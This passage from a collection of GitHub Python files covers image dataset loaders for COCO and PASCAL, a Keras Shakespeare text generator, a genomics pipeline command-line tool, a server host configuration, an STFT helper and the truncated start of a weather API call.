If None, it will not divide with std\n \"\"\"\n\n def __init__(self, mean, std=None):\n self.mean = mean\n self.std = std\n\n def __call__(self, sample):\n \"\"\"\n Args:\n tensor (Tensor): Tensor image of size (C, H, W) to be normalized.\n Returns:\n Tensor: Normalized Tensor image.\n \"\"\"\n image, labels = sample['image'], sample['labels']\n for channel in range(3):\n if self.std:\n image[channel] = (image[channel] - self.mean[channel]) / self.std[channel]\n else:\n image[channel] = image[channel] - self.mean[channel]\n return {'image': image, 'labels': sample['labels'], 'image_path': sample['image_path'], 'bboxes': sample['bboxes']}\n\n def __repr__(self):\n return self.__class__.__name__ + '(mean={0}, std={1})'.format(self.mean, self.std)\n\n\ndef load_MSCOCO_2014_json(mode,MSCOCO_Root_Path):\n return json.load(open(MSCOCO_Root_Path + 'annotations/instances_' + mode + '2014.json'))\n\ndef load_PASCAL_2012_json(mode,PASCAL_Root_Path):\n return json.load(open(PASCAL_Root_Path + 'VOC_JSON_From_COCO/pascal_' + mode + '2012.json'))\n\ndef load_PASCAL_2007_json(mode,PASCAL_Root_Path):\n return json.load(open(PASCAL_Root_Path + 'VOC_JSON_From_COCO/pascal_' + mode + '.json'))\n\ndef get_cat_id_class_id_mapping(json_data):\n categories_dict = json_data['categories']\n # print(json_data)\n running_cat_id_bias = 1\n cat_id_class_id_mapping = {}\n for i_cat in range(len(categories_dict)):\n if i_cat+running_cat_id_bias != categories_dict[i_cat]['id']:\n running_cat_id_bias = categories_dict[i_cat]['id'] - i_cat\n # print(i_cat, running_cat_id_bias)\n cat_id_class_id_mapping[categories_dict[i_cat]['id']] = {'name': categories_dict[i_cat]['name'],\n 'class_label': i_cat}\n\n return cat_id_class_id_mapping\n\n\ndef get_image_id_image_path_dict(json_from_COCO, MSCOCO_Root_Path, mode):\n image_id_image_path_dict = {image['id']:MSCOCO_Root_Path+mode+'2014/'+image['file_name'] \\\n for image in json_from_COCO['images']}\n return image_id_image_path_dict\n\n\ndef get_image_id_image_path_dict_pascal(json_from_PASCAL, PASCAL_Root_Path, mode):\n image_id_image_path_dict = {image['id']:PASCAL_Root_Path+'JPEGImages/'+image['file_name'] \\\n for image in json_from_PASCAL['images']}\n return image_id_image_path_dict\n\n\ndef get_annotation_dict(json_data, image_id_image_path_dict, cat_id_class_id_mapping_dict):\n print(len(cat_id_class_id_mapping_dict))\n annotation_dict = {image['id']:{'bbox_info':[], 'image_path':image_id_image_path_dict[image['id']], \\\n 'classification_labels':[0]*len(cat_id_class_id_mapping_dict)} for image in json_data['images']}\n\n # print(annotation_dict)\n for annotation in json_data['annotations']:\n try:\n annotation_dict[annotation['image_id']]['bbox_info'].append({'bbox':annotation['bbox'], \\\n 'category_id':annotation['category_id'], \\\n 'class_id':cat_id_class_id_mapping_dict[annotation['category_id']]['class_label'], \\\n # 'category':json_from_COCO['categories'][annotation['category_id']-1]['name']})\n 'category':cat_id_class_id_mapping_dict[annotation['category_id']]['name']})\n except IndexError:\n from IPython.core.debugger import set_trace; set_trace()\n # try:\n # print(annotation_dict[annotation['image_id']])\n # print(cat_id_class_id_mapping_dict)\n annotation_dict[annotation['image_id']]['classification_labels'][cat_id_class_id_mapping_dict[annotation['category_id']]['class_label']] = 1\n # except:\n # print(annotation)\n# from IPython.core.debugger import set_trace; set_trace()\n return annotation_dict\n\ndef prep_annotation_json(MSCOCO_Root_Path, mode):\n if not 
os.path.isfile(MSCOCO_Root_Path + mode + '_MSCOCO_annotation.json'):\n # Load the json from COCO\n MSCOCO_2014_json = load_MSCOCO_2014_json(mode, MSCOCO_Root_Path)\n # Create a dict with image ids as keys and image paths as values\n image_id_image_path_dict_2014 = get_image_id_image_path_dict(MSCOCO_2014_json, MSCOCO_Root_Path, mode)\n # MSCOCO does not have continuous class ids. So make them continuous\n cat_id_class_id_mapping_dict = get_cat_id_class_id_mapping(MSCOCO_2014_json)\n # Create a dict with image ids as keys and bounding box infos and image paths as values\n annotation_dict = get_annotation_dict(MSCOCO_2014_json, image_id_image_path_dict_2014, cat_id_class_id_mapping_dict)\n\n # Save the json\n with open(MSCOCO_Root_Path + mode + '_MSCOCO_annotation.json', 'w') as outfile:\n outfile.write(json.dumps(annotation_dict,sort_keys=True, indent=2, separators=(',', ': ')))\n\n # Save the cat_id_class_id_mapping_dict\n with open(MSCOCO_Root_Path + mode + '_MSCOCO_cat_id_class_id_mapping.json', 'w') as outfile:\n outfile.write(json.dumps(cat_id_class_id_mapping_dict,sort_keys=True, indent=2, separators=(',', ': ')))\n\ndef prep_annotation_json_pascal(PASCAL_Root_Path, mode):\n if not os.path.isfile(PASCAL_Root_Path + mode + '_PASCAL_annotation.json'):\n # Load the json from COCO\n PASCAL_2007_json = load_PASCAL_2007_json(mode, PASCAL_Root_Path)\n # Create a dict with image ids as keys and image paths as values\n image_id_image_path_dict_2007 = get_image_id_image_path_dict_pascal(PASCAL_2007_json, PASCAL_Root_Path, mode)\n # MSCOCO does not have continuous class ids. So make them continuous\n cat_id_class_id_mapping_dict = get_cat_id_class_id_mapping(PASCAL_2007_json)\n # Create a dict with image ids as keys and bounding box infos and image paths as values\n annotation_dict = get_annotation_dict(PASCAL_2007_json, image_id_image_path_dict_2007, cat_id_class_id_mapping_dict)\n\n # Save the json\n with open(PASCAL_Root_Path + mode + '_PASCAL_annotation.json', 'w') as outfile:\n outfile.write(json.dumps(annotation_dict,sort_keys=True, indent=2, separators=(',', ': ')))\n\n # Save the cat_id_class_id_mapping_dict\n with open(PASCAL_Root_Path + mode + '_PASCAL_cat_id_class_id_mapping.json', 'w') as outfile:\n outfile.write(json.dumps(cat_id_class_id_mapping_dict,sort_keys=True, indent=2, separators=(',', ': ')))\n\n\ndef prep_annotation_json_pascal12(PASCAL_Root_Path, mode):\n if not os.path.isfile(PASCAL_Root_Path + mode + '_PASCAL_annotation.json'):\n # Load the json from COCO\n PASCAL_2012_json = load_PASCAL_2012_json(mode, PASCAL_Root_Path)\n # Create a dict with image ids as keys and image paths as values\n image_id_image_path_dict_2012 = get_image_id_image_path_dict_pascal(PASCAL_2012_json, PASCAL_Root_Path, mode)\n # MSCOCO does not have continuous class ids. 
So make them continuous\n cat_id_class_id_mapping_dict = get_cat_id_class_id_mapping(PASCAL_2012_json)\n # Create a dict with image ids as keys and bounding box infos and image paths as values\n annotation_dict = get_annotation_dict(PASCAL_2012_json, image_id_image_path_dict_2012, cat_id_class_id_mapping_dict)\n\n # Save the json\n with open(PASCAL_Root_Path + mode + '_PASCAL_annotation.json', 'w') as outfile:\n outfile.write(json.dumps(annotation_dict,sort_keys=True, indent=2, separators=(',', ': ')))\n\n # Save the cat_id_class_id_mapping_dict\n with open(PASCAL_Root_Path + mode + '_PASCAL_cat_id_class_id_mapping.json', 'w') as outfile:\n outfile.write(json.dumps(cat_id_class_id_mapping_dict,sort_keys=True, indent=2, separators=(',', ': ')))\n\ndef class_specific_annotation_json(Root_Path, dataset, mode, class_index):\n\n annotation = pd.DataFrame.from_dict(json.load(open(Root_Path + mode + '_'+dataset+'_annotation.json')),orient='index')\n annotation.reset_index(level=0, inplace=True)\n classification_labels = annotation['classification_labels']\n ids = []\n for idx in range(len(annotation)):\n if classification_labels[idx][class_index] == 1:\n ids.append(idx)\n filtered_annotations = annotation.iloc[ids,1:]\n annotation_dictionary = pd.DataFrame.to_dict(filtered_annotations, orient='index')\n\n with open(Root_Path + mode + '_class_{}_'.format(class_index)+dataset+'_annotation.json', 'w') as fp:\n json.dump(annotation_dictionary, fp, indent=4)\n\n\ndef getImageNet(IMAGENET_Root_Path, datasetType='train', class_id=-1, no_of_training_classes = 100, idx=-1):\n \n tsfrm_imgnet = transforms.Compose([Rescale((224, 224)),\n MakeCHWformat(),\n ToTensor(),\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n dataset = None\n if class_id == -1:\n dataset = ImageNet(IMAGENET_Root_Path+'imagenet_'+datasetType+'.csv', 0, 999, tsfrm_imgnet, idx)\n else:\n dataset = ImageNet(IMAGENET_Root_Path+'imagenet_'+datasetType+'.csv', class_id, class_id + no_of_training_classes - 1, tsfrm_imgnet, idx)\n \n return dataset\n\ndef getPASCAL(PASCAL_Root_Path, datasetType='train', class_id=-1, idx=-1):\n prep_annotation_json_pascal(PASCAL_Root_Path, datasetType)\n if class_id != -1:\n class_specific_annotation_json(PASCAL_Root_Path, 'PASCAL', datasetType, class_id)\n \n tsfrm = transforms.Compose([Rescale((224, 224)),\n ScaleIntensities(),\n MakeCHWformat(),\n RGBtoBGR(),\n ToTensor(),\n Normalize([104.01, 116.67, 122.68])\n ])\n\n dataset = None\n if class_id == -1:\n dataset = MSCOCO_Dataset(json_file=PASCAL_Root_Path + datasetType + '_PASCAL_annotation.json',transform=tsfrm, idx = idx)\n else :\n dataset = MSCOCO_Dataset(json_file=PASCAL_Root_Path + datasetType + '_class_{}_PASCAL_annotation.json'.format(class_id) ,transform=tsfrm, idx = idx)\n \n return dataset\n\ndef getPASCAL12(PASCAL_Root_Path, datasetType='train', class_id=-1, idx=-1):\n prep_annotation_json_pascal12(PASCAL_Root_Path, datasetType)\n if class_id != -1:\n class_specific_annotation_json(PASCAL_Root_Path, 'PASCAL', datasetType, class_id)\n\n tsfrm = transforms.Compose([Rescale((224, 224)),\n MakeCHWformat(),\n ToTensor(),\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n\n dataset = None\n if class_id == -1:\n dataset = MSCOCO_Dataset(json_file=PASCAL_Root_Path + datasetType + '_PASCAL_annotation.json',transform=tsfrm, idx = idx)\n else :\n dataset = MSCOCO_Dataset(json_file=PASCAL_Root_Path + datasetType + '_class_{}_PASCAL_annotation.json'.format(class_id) ,transform=tsfrm, idx = idx)\n \n return dataset\n\ndef 
getMSCOCO(MSCOCO_Root_Path, datasetType='train', class_id=-1, idx = -1):\n prep_annotation_json(MSCOCO_Root_Path, datasetType)\n if class_id != -1:\n class_specific_annotation_json(MSCOCO_Root_Path,'MSCOCO', datasetType, class_id)\n \n tsfrm = transforms.Compose([Rescale((224, 224)),\n ScaleIntensities(),\n MakeCHWformat(),\n RGBtoBGR(),\n ToTensor(),\n Normalize([104.01, 116.67, 122.68])\n ])\n dataset = None \n # tsfrm = None \n if class_id == -1:\n dataset = MSCOCO_Dataset(json_file=MSCOCO_Root_Path + datasetType + '_MSCOCO_annotation.json',transform=tsfrm, idx= idx)\n else :\n dataset = MSCOCO_Dataset(json_file=MSCOCO_Root_Path + datasetType + '_class_{}_MSCOCO_annotation.json'.format(class_id) ,transform=tsfrm, idx=idx)\n \n return dataset","repo_name":"CVIR/RExL","sub_path":"RExL/explainableAI/utils/dataset_util.py","file_name":"dataset_util.py","file_ext":"py","file_size_in_byte":20016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"34647095482","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nPurpose: Word level Natural Language Generation (NLG). This file loads a\r\n previously trained word NLG model from LanguageGenWords_train.py, \r\n and predicts subsequent words. \r\n\r\nTo run: \r\n 1) Set constants below to be the same as the languagegenwords_train.py file\r\n 2) At Anaconda command prompt enter\r\n >> python languagegenwords_predict.py\r\n\r\n\"\"\"\r\n\r\n# ---\r\n# Libs\r\n\r\nimport os\r\nfrom datetime import datetime, timedelta\r\n\r\nimport re\r\nimport numpy as np\r\nfrom nltk import tokenize\r\n\r\nimport tensorflow as tf\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Embedding, LSTM, Dense, Dropout, Bidirectional\r\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\r\nfrom tensorflow.keras.preprocessing.text import Tokenizer\r\nfrom tensorflow.keras import utils as keras_utils\r\n\r\n# ---\r\n# Constants\r\n\r\n# Set CURR_DIR to the subdir with this PY file. Everything else is relative to this subdir.\r\nCURR_DIR = \"C:\\\\NaturalLanguageGen\\\\code\"\r\n\r\n# Predictions reuses the previously cleaned file.\r\nINPUT_FILE = '..\\\\data\\\\Complete_Shakespeare_cleaned.txt'\r\n\r\nMODEL_WEIGHTS_FILE = \"..\\\\Saved_Model\\\\training_GenWords\\\\cp_Epoch_{epoch:02d}_Loss_{loss:.3f}.ckpt\"\r\nMODEL_WEIGHTS_DIR = os.path.dirname(MODEL_WEIGHTS_FILE)\r\n\r\n# The constants below MUST be the SAME as the model trained in LanguageGenChars_training.py.\r\nMAX_SEQ_LEN = 160\r\n#BATCH_SIZE = 256\r\nUNITS = 128\r\nOUTPUT_DIM = 32\r\n\r\n\r\n# ---\r\n# Funcs\r\n\r\ndef clean_text(text):\r\n \"\"\"\r\n Purpose: Pass a string, this func will remove everything and only leave \r\n A-Z, a-z and sentence endings. It will also remove brackets [] and \r\n everything between those brackets like [_Exit._], [_Exeunt._], etc. \r\n \"\"\"\r\n\r\n # Remove brackets and the text within the brackets. \r\n text = \"\".join(re.split(\"\\(|\\)|\\[|\\]\", text)[::2])\r\n\r\n # Remove quotes and replace with no space. \r\n text = re.sub(r\"[\\'\\\"\\‘\\’\\`\\ʹ]\", \"\", text) \r\n \r\n # Keep only a-z and sentence endings, everything else gets a space. 
\r\n new_string = re.sub(\"[^a-zA-Z.?!;]\", \" \", text).strip()\r\n \r\n # Remove consective spaces and leave only one space.\r\n new_string = re.sub(\" +\", \" \", new_string)\r\n \r\n new_string = new_string.lower()\r\n \r\n return(new_string)\r\n\r\n\r\ndef generate_text(seed_text, max_words, max_sequence_len, model, tokenizer):\r\n \"\"\"\r\n Purpose: Given a previously trained NLG model trained on words, pass a \r\n string of seed text and other params to predict new text. \r\n \r\n Created this function from the code below. \r\n \r\n Source: https://colab.research.google.com/github/tensorflow/examples/blob/master/courses/udacity_intro_to_tensorflow_for_deep_learning/l10c03_nlp_constructing_text_generation_model.ipynb#scrollTo=DC7zfcgviDTp&line=1&uniqifier=1\r\n Apache License 2.0.\r\n \"\"\"\r\n \r\n # Clean and lowercase the seed_text so it's like the text used in training.\r\n seed_text = clean_text(seed_text)\r\n \r\n # Convert seed text to a list, add padding, predict the next word, add\r\n # that predicted word to the end of the seed text string and repeat. \r\n for _ in range(max_words):\r\n \ttoken_list = tokenizer.texts_to_sequences([seed_text])[0]\r\n \ttoken_list = pad_sequences([token_list], maxlen=max_sequence_len-1, padding='pre')\r\n \tprediction = np.argmax(model.predict(token_list), axis=-1)\r\n \tpred_word = \"\"\r\n \r\n \tfor word, index in tokenizer.word_index.items():\r\n \t\tif index == prediction:\r\n \t\t\tpred_word = word\r\n \t\t\tbreak\r\n \r\n \tseed_text += \" \" + pred_word\r\n \r\n return(seed_text)\r\n\r\n# ---\r\n# Main\r\n\r\nstart_time = datetime.now()\r\n\r\nos.chdir(CURR_DIR)\r\n\r\n# Load the previously cleaned file.\r\nwith open(INPUT_FILE, 'r', encoding='utf-8') as file:\r\n text = file.read()\r\n\r\n\r\n# NOTE: No need to clean here since the previously cleaned TXT file from \r\n# the training file is reused here. \r\n# Clean the data and lowercase to reduce the number of tokens in the vocabulary. \r\n#text = clean_text(raw_text)\r\n\r\n# Save the cleaned text to see the text the model used. \r\n#with open(OUTPUT_FILE, 'w', encoding='utf-8') as file:\r\n# file.write(text)\r\n\r\n# Split by sentence endings. This will allow us to dynamically determine the \r\n# sequence length.\r\ntok_sents = tokenize.sent_tokenize(text)\r\n\r\ntokenizer = Tokenizer()\r\ntokenizer.fit_on_texts(tok_sents)\r\n\r\n# Get the total number of all words in the doc... just some stats about the data.\r\ntotal_word_count = 0\r\nfor key, value in tokenizer.word_counts.items(): \r\n total_word_count = total_word_count + value\r\n\r\n# Each unique word in the input_file will be given a unique integer. This is \r\n# the size of our vocabulary. \r\n# Example:\r\n#print(tokenizer.word_index)\r\nunique_word_cnt = len(tokenizer.word_index) + 1\r\n\r\nprint (\"Total number of all words:\", total_word_count)\r\nprint (\"Total unique words:\", unique_word_cnt)\r\n\r\n# Each text sequence is converted to a sequence of unique integers. The \r\n# tokenizer.word_index dictionary is used to create this mapping.\r\nsequences = tokenizer.texts_to_sequences(tok_sents)\r\n\r\n# Since the text was split into sentences, most sentences will have different\r\n# lengths. Therefore, need to pad the sequences so they have equal lengths. \r\n\r\n# Find the length of the longest sequence. Since this is a dymamic value driven \r\n# by the input file, it could be a malformed input file so ensure that any single\r\n# sequence doesn't go beyond the constant MAX_SEQ_LEN above. 
Below pad_sequences() \r\n# will trucate sequences if necessary. \r\nmax_sequence_len = max([len(x) for x in sequences])\r\n\r\nif max_sequence_len > MAX_SEQ_LEN:\r\n max_sequence_len = MAX_SEQ_LEN\r\n\r\n# To make each sequence the same length, add padding at the beginning of the sequence. \r\n# Also, truncate sequences from the beginning if they that exceeed the maxlen. \r\n# More info: https://www.tensorflow.org/api_docs/python/tf/keras/preprocessing/sequence/pad_sequences\r\nsequences = np.array(pad_sequences(sequences, maxlen = max_sequence_len, padding='pre', truncating = 'pre'))\r\n\r\nprint (\"\\nNumber of patterns:\", len(sequences))\r\n\r\n# A given set of sequence indicies in x_seq_num, should predict a particular \r\n# index stored in y_pred_num.\r\nx_seq_num, y_pred_num = sequences[:,:-1],sequences[:,-1]\r\n\r\n# One-hot encode the words to be predicted. \r\ny = keras_utils.to_categorical(y_pred_num, num_classes = unique_word_cnt)\r\n\r\ninput_len = max_sequence_len - 1 \r\n\r\n\r\n# A simple model. \r\nmodel = Sequential()\r\nmodel.add(Embedding(unique_word_cnt, OUTPUT_DIM, input_length = input_len, name = \"layer_1\"))\r\nmodel.add(LSTM(UNITS, name = \"layer_2\"))\r\nmodel.add(Dropout(0.2, name = \"layer_3\"))\r\nmodel.add(Dense(unique_word_cnt, activation ='softmax', name = \"layer_4\"))\r\n\r\n'''\r\n# More advanced model. \r\nmodel = Sequential()\r\nmodel.add(Embedding(unique_word_cnt, OUTPUT_DIM, input_length = input_len))\r\nmodel.add(Bidirectional(LSTM(UNITS)))\r\nmodel.add(Dense(unique_word_cnt, activation='softmax'))\r\n'''\r\n\r\nmodel.summary()\r\n\r\n# Compile the model above.\r\nmodel.compile(loss = 'categorical_crossentropy', \r\n optimizer = 'adam',\r\n #optimizer = RMSprop(learning_rate=0.01), # Maybe try a different optimizer and learning rate. \r\n metrics = ['accuracy'])\r\n\r\n# Optional print to see details of the model for logging and comparisons. \r\nprint(\"\\nModel Config:\\n%s\\n\" % model.get_config())\r\n\r\n# Optional: Evaluate the Untrained model. \r\nprint(\"\\nEvaluating the untrained model...\")\r\nloss, acc = model.evaluate(x_seq_num, y, verbose=2)\r\nprint(\"\\nUntrained model accuracy: {:5.2f}%\".format(100 * acc))\r\n\r\n# Load the best performing model. \r\nmodel_weights = tf.train.latest_checkpoint(MODEL_WEIGHTS_DIR) \r\nprint(\"\\nLoading best model weight file: %s\" % model_weights)\r\nmodel.load_weights(model_weights)\r\n\r\n# Required - Re-evaluate the model. \r\nprint(\"\\nEvaluating the trained model...\")\r\nloss, acc = model.evaluate(x_seq_num, y, verbose=2)\r\nprint(\"\\nRestored model accuracy: {:5.2f}%\".format(100 * acc))\r\n\r\n# Now, predict new text. Real Shakespeare in seed_text. 
\r\n#seed_text = \"from fairest creatures we desire increase that thereby beauty rose might never die\"\r\nseed_text = \"to be or not to be that is the question\"\r\n\r\ntext = generate_text(seed_text, 20, max_sequence_len, model, tokenizer)\r\nprint(\"\\nSeed text:\\n\", seed_text)\r\nprint(\"\\nGenerated text:\\n\", text)\r\n\r\n# Print stats about the run.\r\nend_time = datetime.now()\r\nelapsed_time = end_time - start_time\r\ntime_diff_mins = elapsed_time / timedelta(minutes=1)\r\nprint(\"\\nTotal runtime %.1f minutes or %.1f hours.\" % (time_diff_mins, time_diff_mins / 60))\r\n\r\n\r\n","repo_name":"craiggua/NaturalLanguageGen","sub_path":"code/LanguageGenWords_Predict.py","file_name":"LanguageGenWords_Predict.py","file_ext":"py","file_size_in_byte":8671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"73988048693","text":"\"\"\"Run analysis pipeline for NGS data.\n\nHandles runs in local or distributed mode based on the command line or\nconfigured parameters.\n\nAuthor: Shujia Huang\nDate: 2020-04-19\n\n\"\"\"\nimport argparse\nimport sys\nimport yaml\nfrom pathlib import Path\nfrom datetime import datetime\n\n# Import specific functions of ilus\nfrom ilus.pipeline import (\n    WGS, create_wgs_pipeline_command,\n    genotypeGVCFs, create_genotype_joint_calling_command,\n    variantrecalibrator, create_vqsr_command\n)\nfrom ilus.modules.utils import split_jobs, check_jobs_status\n\nPROG_NAME = \"ilus\"\nVERSION = \"1.3.2\"\n\n\ndef create_split_job_command(commands):\n    # Create subparser for the \"split-jobs\" command\n    split_job_cmd = commands.add_parser(\"split-jobs\", help=\"Split the whole shell script into multiple jobs.\")\n    split_job_cmd.add_argument(\n        \"-I\", \"--input\",\n        dest=\"input\",\n        required=True,\n        help=\"Input shell file.\"\n    )\n    split_job_cmd.add_argument(\n        \"-p\", \"--prefix\",\n        dest=\"prefix\",\n        type=str,\n        default=\"work\",\n        help=\"The prefix name for output sub-shells. (default: %(default)s)\"\n    )\n    split_job_cmd.add_argument(\n        \"-n\", \"--number\",\n        dest=\"number\",\n        type=int,\n        required=True,\n        help=\"Number of sub-jobs.\"\n    )\n    split_job_cmd.add_argument(\n        \"-t\", \"--parallel\",\n        dest=\"t\",\n        type=int,\n        required=True,\n        help=\"Number of parallel tasks per sub-job.\"\n    )\n\n    return\n\n\ndef create_check_job_command(commands):\n    # Create subparser for the \"check-jobs\" command\n    check_job_cmd = commands.add_parser(\"check-jobs\", help=\"Check whether the jobs have finished or not.\")\n    check_job_cmd.add_argument(\n        \"-I\", \"--input\",\n        dest=\"input\",\n        required=True,\n        help=\"Task log file with suffix '.o.log.list'. For the ilus pipeline, this can always \"\n             \"be found in the folder 'loginfo/', e.g.: loginfo/01.alignment.o.log.list\"\n    )\n\n    return\n\n\ndef parse_commandline_args():\n    \"\"\"Parse input commandline arguments, handling multiple cases.\n    \"\"\"\n    cmdparser = argparse.ArgumentParser(\n        prog=PROG_NAME,\n        description=f\"{PROG_NAME} (Version = {VERSION}): A WGS/WES analysis pipeline generator.\",\n        epilog=\"That's how you can use %(prog)s\"\n    )\n\n    cmdparser.add_argument(\n        \"-v\", \"--version\",\n        action=\"store_true\",\n        help=f\"show the version of {PROG_NAME} and exit.\"\n    )\n\n    commands = cmdparser.add_subparsers(dest=\"command\", title=f\"{PROG_NAME} commands\")\n\n    # The arguments for the whole pipeline of WGS.\n    create_wgs_pipeline_command(commands)\n\n    # The arguments for the joint-calling process\n    create_genotype_joint_calling_command(commands)\n\n    # The arguments for the VQSR process\n    create_vqsr_command(commands)\n\n    # Utility tools\n    create_split_job_command(commands)\n    create_check_job_command(commands)\n\n    return cmdparser.parse_args()\n\n\ndef load_config(config_file):\n    with open(config_file) as f:\n        return yaml.safe_load(f)\n\n\ndef get_intervals(interval_file):\n    if not Path(interval_file).is_file():\n        raise ValueError(f\"Invalid interval file: {interval_file}\")\n\n    with open(interval_file) as f:\n        \"\"\"Bed format:\n        chr1\t10001\t207666\n        chr1\t257667\t297968\n        \"\"\"\n        return [line.strip().split()[:3] for line in f if not line.startswith(\"#\")]\n\n\ndef run_command(args):\n    if args.version:\n        print(f\"{PROG_NAME} {VERSION}\", file=sys.stderr)\n        sys.exit(0)\n\n    if args.command is None:\n        print(f\"Please type: {PROG_NAME} -h or {PROG_NAME} --help to show the help message.\\n\",\n              file=sys.stderr)\n        sys.exit(1)\n\n    if args.command == \"split-jobs\":\n        split_jobs(args.input, args.number, args.t, prefix=args.prefix)\n        return\n\n    if args.command == \"check-jobs\":\n        check_jobs_status(args.input)\n        return\n\n    runner = {\n        \"WGS\": WGS,\n        \"genotype-joint-calling\": genotypeGVCFs,\n        \"VQSR\": variantrecalibrator,\n    }\n\n    if args.command not in runner:\n        raise ValueError(f\"Invalid command: {args.command}\")\n\n    # Load the global configuration file.\n    config = load_config(args.sysconf)\n\n    if \"variant_calling_interval\" in config[\"gatk\"]:\n        if (type(config[\"gatk\"][\"variant_calling_interval\"]) is str) \\\n                and (Path(config[\"gatk\"][\"variant_calling_interval\"]).is_file()):\n            # A file for recording intervals\n            interval_file = config[\"gatk\"][\"variant_calling_interval\"]\n            # reset the value to be a list of interval regions\n            config[\"gatk\"][\"variant_calling_interval\"] = get_intervals(interval_file)\n\n        elif type(config[\"gatk\"][\"variant_calling_interval\"]) is not list:\n            raise ValueError(f\"'variant_calling_interval' parameter can only be a file path or \"\n                             f\"a list of chromosome ids in the configuration file: {args.sysconf}.\\n\")\n\n    else:\n        raise ValueError(f\"'variant_calling_interval' parameter is required \"\n                         f\"in the configuration file: {args.sysconf}.\\n\")\n\n    # Record all information in a single dict.\n    aione = {\"config\": config}\n    runner[args.command](args, aione)\n\n    return\n\n\ndef main():\n    START_TIME = datetime.now()\n\n    args = parse_commandline_args()\n    run_command(args)\n\n    elapsed_time = datetime.now() - START_TIME\n    print(f\"\\n{PROG_NAME} (version: {VERSION}) for '{args.command}' done, \"\n          f\"{elapsed_time.seconds} seconds elapsed.\", file=sys.stderr)\n\n    
return\n","repo_name":"ShujiaHuang/ilus","sub_path":"ilus/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5552,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"21"} +{"seq_id":"22618776716","text":"#!/usr/bin/env python\nTEST_AWSHOSTS = ['ec2-13-127-218-103.ap-south-1.compute.amazonaws.com']\nDEV_AWSHOSTS = ['localhost']\nPROD_AWSHOSTS = ['ec2-35-154-204-254.ap-south-1.compute.amazonaws.com',\n 'ec2-13-126-102-44.ap-south-1.compute.amazonaws.com']\nSTG_AWSHOSTS = ['ec2-35-154-81-185.ap-south-1.compute.amazonaws.com']\nLOCALHOST = ['localhost']\n\nALLHOSTS = {\n 'stage': {\n 'RABBITSERVER': LOCALHOST,\n 'RECOSERVER': STG_AWSHOSTS,\n 'LOCATIONSERVER':STG_AWSHOSTS,\n 'WIZSERVER': STG_AWSHOSTS,\n 'NGINX': STG_AWSHOSTS,\n 'MEMCACHE': STG_AWSHOSTS,\n },\n 'dev': {\n 'RABBITSERVER': LOCALHOST,\n\t 'LOCATIONSERVER':DEV_AWSHOSTS,\n 'RECOSERVER': DEV_AWSHOSTS,\n 'WIZSERVER': DEV_AWSHOSTS,\n 'NGINX': DEV_AWSHOSTS,\n 'MEMCACHE': DEV_AWSHOSTS,\n },\n 'test': {\n 'RABBITSERVER': LOCALHOST,\n\t 'RECOSERVER' : TEST_AWSHOSTS,\n 'LOCATIONSERVER': TEST_AWSHOSTS,\n 'WIZSERVER': TEST_AWSHOSTS,\n 'NGINX': TEST_AWSHOSTS,\n 'MEMCACHE': TEST_AWSHOSTS,\n },\n 'prod': {\n 'RABBITSERVER': LOCALHOST,\n 'LOCATIONSERVER': [PROD_AWSHOSTS[0]],\n 'WIZSERVER': PROD_AWSHOSTS,\n 'NGINX': PROD_AWSHOSTS,\n 'MEMCACHE': PROD_AWSHOSTS,\n }\n}\n\nRUNHOSTS = {\n 'dev': {\n 'LOCATIONSERVER': ['localhost'],\n 'MEMCACHE': ['localhost:11211'],\n 'NGINX': ['localhost'],\n 'RABBITSERVER': ['localhost'],\n 'RECOSERVER': ['localhost'],\n 'WIZSERVER': ['localhost']\n },\n 'prod': {\n 'LOCATIONSERVER': ['172.31.28.254'],\n 'MEMCACHE': ['172.31.26.42:11211',\n '172.31.28.254:11211'],\n 'NGINX': ['172.31.26.42',\n '172.31.28.254'],\n 'RABBITSERVER': ['localhost'],\n 'WIZSERVER': ['172.31.26.42',\n '172.31.28.254']\n },\n 'stage': {\n 'LOCATIONSERVER': ['172.31.9.38'],\n 'MEMCACHE': ['172.31.9.38:11211'],\n 'NGINX': ['172.31.9.38'],\n 'RABBITSERVER': ['localhost'],\n 'RECOSERVER': ['172.31.9.38'],\n 'WIZSERVER': ['172.31.9.38']\n },\n 'test': {\n 'LOCATIONSERVER': ['172.31.24.237'],\n 'MEMCACHE': ['172.31.24.237:11211'],\n 'NGINX': ['172.31.24.237'],\n 'RABBITSERVER': ['localhost'],\n 'RECOSERVER': ['172.31.24.237'],\n 'WIZSERVER': ['172.31.24.237']}\n}\n","repo_name":"wizcarder/wizcard-server","sub_path":"wizcard/instances.py","file_name":"instances.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1565690604","text":"def stft(sig, frameSize, overlapFac=0.75, window=np.hanning):\n \"\"\" short time fourier transform of audio signal \"\"\"\n win = window(frameSize)\n hopSize = int(frameSize - np.floor(overlapFac * frameSize))\n # zeros at beginning (thus center of 1st window should be for sample nr. 
0)\n # samples = np.append(np.zeros(np.floor(frameSize / 2.0)), sig)\n samples = np.array(sig, dtype='float64')\n # cols for windowing\n cols = np.ceil((len(samples) - frameSize) / float(hopSize)) + 1\n # zeros at end (thus samples can be fully covered by frames)\n samples = np.append(samples, np.zeros(frameSize))\n frames = stride_tricks.as_strided(\n samples,\n shape=(cols, frameSize),\n strides=(samples.strides[0] * hopSize, samples.strides[0])).copy()\n frames *= win\n return np.fft.rfft(frames) \n","repo_name":"mehmetpekmezci/urban_sound_classification","sub_path":"examples/stft.py","file_name":"stft.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"40907825612","text":"import json\nimport os\n\nimport requests\nfrom Job import Job\nfrom job_handler import parseString\nfrom QueueObj import QueueObj\n\n\ndef get_weather(city, elementName):\n url = \"https://opendata.cwb.gov.tw/api/v1/rest/datastore/F-C0032-001\"\n headers = {\"user-agent\": \"Mozilla/5.0\"}\n params 